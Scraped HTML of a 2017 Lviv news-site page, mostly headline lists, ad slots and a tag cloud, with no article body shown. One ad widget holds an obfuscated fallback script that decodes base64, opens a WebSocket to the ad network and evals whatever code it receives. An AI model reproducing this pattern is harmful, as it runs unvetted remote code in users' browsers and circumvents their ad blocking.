href="https://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F11%2F28%2Flviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko%2F&amp;linkname=%D0%9B%D1%8C%D0%B2%D1%96%D0%B2%20%D1%81%D0%BF%D1%96%D0%B2%D0%BF%D1%80%D0%B0%D1%86%D1%8E%D0%B2%D0%B0%D1%82%D0%B8%D0%BC%D0%B5%20%D0%B7%20%D0%BD%D1%96%D0%BC%D0%B5%D1%86%D1%8C%D0%BA%D0%B8%D0%BC%D0%B8%20%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82%D0%B0%D0%BC%D0%B8%2C%20%D1%8F%D0%BA%D1%96%C2%A0%20%D0%B4%D0%BE%D0%BF%D0%BE%D0%BC%D0%BE%D0%B6%D1%83%D1%82%D1%8C%20%D1%80%D0%BE%D0%B7%D0%B2%D0%B8%D0%B2%D0%B0%D1%82%D0%B8%20%D1%83%D1%81%D0%B5%20%D0%BC%D1%96%D1%81%D1%82%D0%BE%2C-%20%D0%9C%D0%BE%D1%81%D0%BA%D0%B0%D0%BB%D0%B5%D0%BD%D0%BA%D0%BE" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_google_plus" href="https://www.addtoany.com/add_to/google_plus?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F11%2F28%2Flviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko%2F&amp;linkname=%D0%9B%D1%8C%D0%B2%D1%96%D0%B2%20%D1%81%D0%BF%D1%96%D0%B2%D0%BF%D1%80%D0%B0%D1%86%D1%8E%D0%B2%D0%B0%D1%82%D0%B8%D0%BC%D0%B5%20%D0%B7%20%D0%BD%D1%96%D0%BC%D0%B5%D1%86%D1%8C%D0%BA%D0%B8%D0%BC%D0%B8%20%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82%D0%B0%D0%BC%D0%B8%2C%20%D1%8F%D0%BA%D1%96%C2%A0%20%D0%B4%D0%BE%D0%BF%D0%BE%D0%BC%D0%BE%D0%B6%D1%83%D1%82%D1%8C%20%D1%80%D0%BE%D0%B7%D0%B2%D0%B8%D0%B2%D0%B0%D1%82%D0%B8%20%D1%83%D1%81%D0%B5%20%D0%BC%D1%96%D1%81%D1%82%D0%BE%2C-%20%D0%9C%D0%BE%D1%81%D0%BA%D0%B0%D0%BB%D0%B5%D0%BD%D0%BA%D0%BE" title="Google+" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd a2a_counter addtoany_share_save" href="https://www.addtoany.com/share"></a></div></div><!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ --><div class="fb-comments" data-href="http://gazeta.lviv.ua/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/" data-numposts="20" data-width="100%" data-colorscheme="light"></div>                    </div>

<!--end-->


                    <div class="single-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Банер під статею -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9951724072058821"
     data-ad-slot="5412064588"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></aside><aside id="black-studio-tinymce-29" class="all-devices  ads-widget widget_black_studio_tinymce">реклама<div class="textwidget"><div id="riainfo_56108fd8d1a24d996679d8cb597acd6d"></div>
<p><script type="text/javascript" src="https://cobrand.ria.com/js/ria_informer.js?riacode=56108fd8d1a24d996679d8cb597acd6d" ></script></p>
<p>
<script id="r18284" type="text/javascript">
    (function() {
        var worker18284,
            tickerID = 18284,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);
        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/18/ticker_18284.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;
                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';
                function runExternalMessage(data) {
                    worker18284.postMessage(data);
                }
                worker18284 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));
                worker18284.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };
                worker18284.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script></p>
</div></aside></div>
					<div class="entry-tags">Позначки: <a href="http://gazeta.lviv.ua/tag/mizhnarodna-spivpracya/" rel="tag">міжнародна співпраця</a><a href="http://gazeta.lviv.ua/tag/misto/" rel="tag">Місто</a></div>                </div>
            </div>
            
    <div class="column_left"><aside id="left-news-widget-2" class="all-devices  widget left_news_widget"><div class="widget_title"><a href="http://gazeta.lviv.ua/novini/">Новини</a></div><div class="widget_content"><div class="news-posts-list"><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T21:20:38+00:00">21:20, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/sinoptiki-poperedzhayut-pro-tuman-ta-ozheledicyu-2/">Синоптики попереджають про туман та ожеледицю</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T20:34:06+00:00">20:34, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/oksana-muxa-zaproshuye-na-rizdvyanij-vechir-u-lvivsku-operu/">Оксана Муха запрошує на «Різдвяний вечір» у Львівську оперу</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T19:57:14+00:00">19:57, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/diyachi-kulturi-shhe-mozhut-uzyati-uchast-v-konkursi-menedzheriv-mizhdisciplinarnix-proektiv/">Діячі культури ще можуть узяти участь в конкурсі менеджерів міждисциплінарних проектів</a></h3></div></div><div class="post-item post-news-item strong"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/11/27/dvi-yalinki-j-nova-ilyuminaciya-yakim-bude-centr-lvova-na-novorichno-rizdvyani-svyata/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/rizdvo_u_lvovi-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/11/27/dvi-yalinki-j-nova-ilyuminaciya-yakim-bude-centr-lvova-na-novorichno-rizdvyani-svyata/">Дві ялинки й нова ілюмінація: яким буде центр Львова на новорічно-різдвяні свята</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-11-27T12:10:36+00:00">12:10, Пн. - 27 Лис. 2017</time>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 2237</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/11/27/dvi-yalinki-j-nova-ilyuminaciya-yakim-bude-centr-lvova-na-novorichno-rizdvyani-svyata/"></span></div>
		</div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T19:16:33+00:00">19:16, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/derzhlisgospi-rozpochinayut-realizaciyu-novorichnix-yalinok/">Держлісгоспи розпочинають реалізацію новорічних ялинок</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T18:45:53+00:00">18:45, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/meriya-gotova-pogoditisya-na-5-griven-za-proyizd-u-marshrutkax-perevizniki-vimagayut-bilshe/">Мерія готова погодитися на 5 гривень за проїзд у маршрутках, перевізники вимагають більше</a></h3></div></div><div class="post-item news-item"><div class="entry advertising"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T18:26:39+00:00">18:26, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/u-truskavci-privatbank-vidav-pershu-premialnu-kartku-world-black-edition/">У Трускавці ПриватБанк видав першу преміальну картку World Black Edition</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T17:59:49+00:00">17:59, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/na-lichakivskomu-cvintari-zatrimali-cholovika-yakij-vikrav-ramku-z-portreta-zagiblogo-bijcya-ato/">На Личаківському цвинтарі затримали чоловіка, який викрав рамку з портрета загиблого бійця АТО</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T17:33:12+00:00">17:33, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/kanatna-doroga-na-visokij-zamok-zvidki-kudi-dlya-chogo/">Канатна дорога на Високий замок: звідки, куди і для чого</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T17:15:40+00:00">17:15, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/lviv-spivpracyuvatime-z-nimeckimi-proektami-yaki-dopomozhut-rozvivati-use-misto-moskalenko/">Львів співпрацюватиме з німецькими проектами, які  допоможуть розвивати усе місто,- Москаленко</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T16:50:40+00:00">16:50, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/pid-lvivskoyu-oda-mitinguvali-pracivniki-lisgospiv/">Під Львівською ОДА мітингували працівники лісгоспів</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T16:30:50+00:00">16:30, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/cherez-tuman-aeroport-lviv-skasuvav-nizku-rejsiv/">Через туман аеропорт «Львів» скасував більшість рейсів</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T16:01:23+00:00">16:01, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/19-richnij-lviv-yanin-v-yixav-u-shvidku-yaka-pribula-na-misce-dtp/">19-річний львів’янин в’їхав у «швидку», яка прибула на місце ДТП</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T15:30:51+00:00">15:30, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/zhitlo-transport-gromadski-prostori-u-lvovi-rozkazhut-yak-zrobiti-misto-komfortnim/">Житло, транспорт і громадські простори: у Львові розкажуть, як зробити місто комфортним</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T15:06:42+00:00">15:06, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/u-lvovi-shhe-odna-avtostanciya-pracyuye-bez-licenziyi/">У Львові ще одна автостанція працює без ліцензії</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T14:39:30+00:00">14:39, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/lviv-yani-otrimuyut-monetizaciyu-za-nevikoristani-subsidiyi/">Львів’яни отримують гроші за невикористані субсидії</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T14:11:51+00:00">14:11, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/za-letalnu-pomilku-likariv-vidpravili-na-kursi-pidvishhennya-kvalifikaciyi/">За летальну помилку лікарів відправили на курси підвищення кваліфікації</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T13:33:38+00:00">13:33, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/sluzhba-avtomobilnix-dorig-zamovila-proekt-pivnichnogo-ob-yizdu-lvova/">Служба автомобільних доріг замовила проект північного об&#8217;їзду Львова</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T12:45:01+00:00">12:45, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/u-malajziyi-vidznachili-richnicyu-golodomoru-foto/">У Малайзії відзначили річницю Голодомору (фото)</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T12:04:30+00:00">12:04, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/dvoye-pidlitkiv-z-drogobicha-obikrali-avtomobil/">Двоє підлітків з Дрогобича обікрали автомобіль</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T11:47:06+00:00">11:47, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/minuloyi-dobi-leleki-prinesli-u-lvivski-rodini-32-nemovlyat/">Минулої доби лелеки принесли у львівські родини 32 немовлят</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T11:29:32+00:00">11:29, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/na-lvivshhini-xochut-stvoriti-shhe-odnu-otg/">На Львівщині хочуть створити ще одну ОТГ</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T11:08:24+00:00">11:08, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/u-brodivskomu-rajoni-zgorilo-tri-tonni-sina/">У Бродівському районі згоріло три тонни сіна</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T10:40:36+00:00">10:40, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/pid-kolesami-elektrichki-zaginuv-meshkanec-lvivshhini/">Під колесами електрички загинув мешканець Львівщини</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T10:16:52+00:00">10:16, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/u-lvovi-zgoriv-dachnij-budinochok/">У Львові згорів дачний будиночок</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T09:34:01+00:00">09:34, Вт. - 28 Лис. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/11/28/na-ploshhi-bilya-mitropolichix-palat-pracyuvatime-yarmarok-svyatogo-mikolaya/">На площі біля Митрополичих палат працюватиме ярмарок святого Миколая</a></h3></div></div></div></div></aside></div>
        </div>
        
    <div class="column_right"><aside id="spec-project-widget-3" class="all-devices  widget spec_project_widget"><div class="widget_title">Спецпроекти</div><div class="widget_content"><div class="spec_item clearfix"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/11/23/minagro-vs-lis-velika-afera-uryadovogo-dvoru/"><img src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/boks.jpg" alt="Мінагро VS ліс: велика афера урядового двору"></a></div><div class="entry"><a href="http://gazeta.lviv.ua/2017/11/23/minagro-vs-lis-velika-afera-uryadovogo-dvoru/">Мінагро VS ліс: велика афера урядового двору</a></div></div></div></aside><aside class="all-devices  widget gazet-widget"><a href="http://www.moyo.ua" target="_blank"><img width="300" height="250" src='http://gazeta.lviv.ua/wp-content/uploads/2017/04/moyoopt.gif' alt='' title='moyoopt' /></a></aside><aside id="posts-by-tags-widget-2" class="all-devices purple-border widget category_posts_widget"><div class="widget_title">Читайте також</div><div class="widget_content"><div class="category-posts-list"><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/11/24/ivan-ostapovich-na-budinok-organnoyi-muziki-u-lvovi-chekaye-bagato-zmin/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/ostapovich-6-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/11/24/ivan-ostapovich-na-budinok-organnoyi-muziki-u-lvovi-chekaye-bagato-zmin/">Іван Остапович: На будинок органної музики у Львові чекає багато змін</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-11-24T12:20:22+00:00">12:20, Пт. - 24 Лис. 2017</time>&nbsp;|&nbsp;
					<span class="item-author">Святослав Драбчук</span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 931</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/11/24/ivan-ostapovich-na-budinok-organnoyi-muziki-u-lvovi-chekaye-bagato-zmin/"></span></div>
		</div></div><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/11/01/shhirec-otrimav-u-podarunok-vid-nimciv-dvi-pozhezhni-mashini/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/dsc_0158-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/11/01/shhirec-otrimav-u-podarunok-vid-nimciv-dvi-pozhezhni-mashini/">Щирець отримав у подарунок від німців дві пожежні машини</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-11-01T17:29:40+00:00">17:29, Ср. - 01 Лис. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"><a href="http://gazeta.lviv.ua/author/ilkiv/">Тетяна Ільків</a></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 2331</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/11/01/shhirec-otrimav-u-podarunok-vid-nimciv-dvi-pozhezhni-mashini/"></span></div>
		</div></div><div class="post-item"><div class="without-thumb"><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/10/03/lvivshhinu-vidvidali-posli-vishegradskoyi-grupi/">Львів відвідали посли Вишеградської групи</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-10-03T10:25:35+00:00">10:25, Вт. - 03 Жов. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 368</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/10/03/lvivshhinu-vidvidali-posli-vishegradskoyi-grupi/"></span></div>
		</div></div></div></div></div></aside><aside id="category-posts-widget-3" class="all-devices purple-border widget category_posts_widget"><div class="widget_title"><a href="http://gazeta.lviv.ua/novini/">Новини</a></div><div class="widget_content"><div class="category-posts-list"><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/11/28/sinoptiki-poperedzhayut-pro-tuman-ta-ozheledicyu-2/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/1460974303-5472-foto-unian-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/11/28/sinoptiki-poperedzhayut-pro-tuman-ta-ozheledicyu-2/">Синоптики попереджають про туман та ожеледицю</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T21:20:38+00:00">21:20, Вт. - 28 Лис. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 103</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/11/28/sinoptiki-poperedzhayut-pro-tuman-ta-ozheledicyu-2/"></span></div>
		</div></div><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/11/28/oksana-muxa-zaproshuye-na-rizdvyanij-vechir-u-lvivsku-operu/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/mukha65-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/11/28/oksana-muxa-zaproshuye-na-rizdvyanij-vechir-u-lvivsku-operu/">Оксана Муха запрошує на «Різдвяний вечір» у Львівську оперу</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T20:34:06+00:00">20:34, Вт. - 28 Лис. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 101</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/11/28/oksana-muxa-zaproshuye-na-rizdvyanij-vechir-u-lvivsku-operu/"></span></div>
		</div></div><div class="post-item"><div class="without-thumb"><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/11/28/diyachi-kulturi-shhe-mozhut-uzyati-uchast-v-konkursi-menedzheriv-mizhdisciplinarnix-proektiv/">Діячі культури ще можуть узяти участь в конкурсі менеджерів міждисциплінарних проектів</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-11-28T19:57:14+00:00">19:57, Вт. - 28 Лис. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 120</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/11/28/diyachi-kulturi-shhe-mozhut-uzyati-uchast-v-konkursi-menedzheriv-mizhdisciplinarnix-proektiv/"></span></div>
		</div></div></div></div></div></aside><aside class="all-devices  widget gazet-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Хмарочос -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9951724072058821"
     data-ad-slot="3155590425"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></aside><aside id="tag_cloud-2" class="all-devices purple-border widget widget_tag_cloud"><div class="widget_title">Позначки</div><div class="tagcloud"><a href="http://gazeta.lviv.ua/tag/ato/" class="tag-cloud-link tag-link-682 tag-link-position-1" style="font-size: 9.47pt;" aria-label="АТО (99 елементів)">АТО</a>
<a href="http://gazeta.lviv.ua/tag/dsns/" class="tag-cloud-link tag-link-265 tag-link-position-2" style="font-size: 12.76pt;" aria-label="ДСНС (297 елементів)">ДСНС</a>
<a href="http://gazeta.lviv.ua/tag/dtp/" class="tag-cloud-link tag-link-67 tag-link-position-3" style="font-size: 15.14pt;" aria-label="ДТП (639 елементів)">ДТП</a>
<a href="http://gazeta.lviv.ua/tag/dfs/" class="tag-cloud-link tag-link-1258 tag-link-position-4" style="font-size: 10.17pt;" aria-label="ДФС (126 елементів)">ДФС</a>
<a href="http://gazeta.lviv.ua/tag/ekonomika/" class="tag-cloud-link tag-link-2074 tag-link-position-5" style="font-size: 9.68pt;" aria-label="Економіка (106 елементів)">Економіка</a>
<a href="http://gazeta.lviv.ua/tag/lkp-lev/" class="tag-cloud-link tag-link-160 tag-link-position-6" style="font-size: 8.42pt;" aria-label="ЛКП Лев (69 елементів)">ЛКП Лев</a>
<a href="http://gazeta.lviv.ua/tag/lmr/" class="tag-cloud-link tag-link-276 tag-link-position-7" style="font-size: 9.19pt;" aria-label="ЛМР (91 елемент)">ЛМР</a>
<a href="http://gazeta.lviv.ua/tag/loda/" class="tag-cloud-link tag-link-232 tag-link-position-8" style="font-size: 13.39pt;" aria-label="ЛОДА (364 елементи)">ЛОДА</a>
<a href="http://gazeta.lviv.ua/tag/lvivska-filarmoniya/" class="tag-cloud-link tag-link-262 tag-link-position-9" style="font-size: 9.05pt;" aria-label="Львівська філармонія (87 елементів)">Львівська філармонія</a>
<a href="http://gazeta.lviv.ua/tag/lvivski-novini/" class="tag-cloud-link tag-link-2043 tag-link-position-10" style="font-size: 22pt;" aria-label="Львівські новини (6&nbsp;153 елементи)">Львівські новини</a>
<a href="http://gazeta.lviv.ua/tag/misto/" class="tag-cloud-link tag-link-1776 tag-link-position-11" style="font-size: 10.38pt;" aria-label="Місто (134 елементи)">Місто</a>
<a href="http://gazeta.lviv.ua/tag/narodnij-kontrol/" class="tag-cloud-link tag-link-2344 tag-link-position-12" style="font-size: 8.63pt;" aria-label="Народний контроль (74 елементи)">Народний контроль</a>
<a href="http://gazeta.lviv.ua/tag/privatbank/" class="tag-cloud-link tag-link-87 tag-link-position-13" style="font-size: 10.66pt;" aria-label="ПриватБанк (147 елементів)">ПриватБанк</a>
<a href="http://gazeta.lviv.ua/tag/sbu/" class="tag-cloud-link tag-link-636 tag-link-position-14" style="font-size: 9.19pt;" aria-label="СБУ (90 елементів)">СБУ</a>
<a href="http://gazeta.lviv.ua/tag/suspilstvo/" class="tag-cloud-link tag-link-2480 tag-link-position-15" style="font-size: 16.26pt;" aria-label="Суспільство (925 елементів)">Суспільство</a>
<a href="http://gazeta.lviv.ua/tag/uku/" class="tag-cloud-link tag-link-197 tag-link-position-16" style="font-size: 8.28pt;" aria-label="УКУ (66 елементів)">УКУ</a>
<a href="http://gazeta.lviv.ua/tag/avto/" class="tag-cloud-link tag-link-77 tag-link-position-17" style="font-size: 9.19pt;" aria-label="авто (90 елементів)">авто</a>
<a href="http://gazeta.lviv.ua/tag/aeroport/" class="tag-cloud-link tag-link-521 tag-link-position-18" style="font-size: 8pt;" aria-label="аеропорт (61 елемент)">аеропорт</a>
<a href="http://gazeta.lviv.ua/tag/vistavka/" class="tag-cloud-link tag-link-140 tag-link-position-19" style="font-size: 9.68pt;" aria-label="виставка (105 елементів)">виставка</a>
<a href="http://gazeta.lviv.ua/tag/departament-z-pitan-civilnogo-zaxistu-loda/" class="tag-cloud-link tag-link-480 tag-link-position-20" style="font-size: 10.31pt;" aria-label="департамент з питань цивільного захисту ЛОДА (132 елементи)">департамент з питань цивільного захисту ЛОДА</a>
<a href="http://gazeta.lviv.ua/tag/ekologiya/" class="tag-cloud-link tag-link-2487 tag-link-position-21" style="font-size: 8.84pt;" aria-label="екологія (81 елемент)">екологія</a>
<a href="http://gazeta.lviv.ua/tag/za-kordonom/" class="tag-cloud-link tag-link-2525 tag-link-position-22" style="font-size: 9.68pt;" aria-label="за кордоном (105 елементів)">за кордоном</a>
<a href="http://gazeta.lviv.ua/tag/zdorov-ya/" class="tag-cloud-link tag-link-1688 tag-link-position-23" style="font-size: 11.71pt;" aria-label="здоров&#039;я (208 елементів)">здоров&#039;я</a>
<a href="http://gazeta.lviv.ua/tag/konkurs/" class="tag-cloud-link tag-link-73 tag-link-position-24" style="font-size: 9.61pt;" aria-label="конкурс (104 елементи)">конкурс</a>
<a href="http://gazeta.lviv.ua/tag/kontrabanda/" class="tag-cloud-link tag-link-309 tag-link-position-25" style="font-size: 8.21pt;" aria-label="контрабанда (65 елементів)">контрабанда</a>
<a href="http://gazeta.lviv.ua/tag/kradizhka/" class="tag-cloud-link tag-link-64 tag-link-position-26" style="font-size: 13.11pt;" aria-label="крадіжка (333 елементи)">крадіжка</a>
<a href="http://gazeta.lviv.ua/tag/kultura/" class="tag-cloud-link tag-link-1663 tag-link-position-27" style="font-size: 11.29pt;" aria-label="культура (183 елементи)">культура</a>
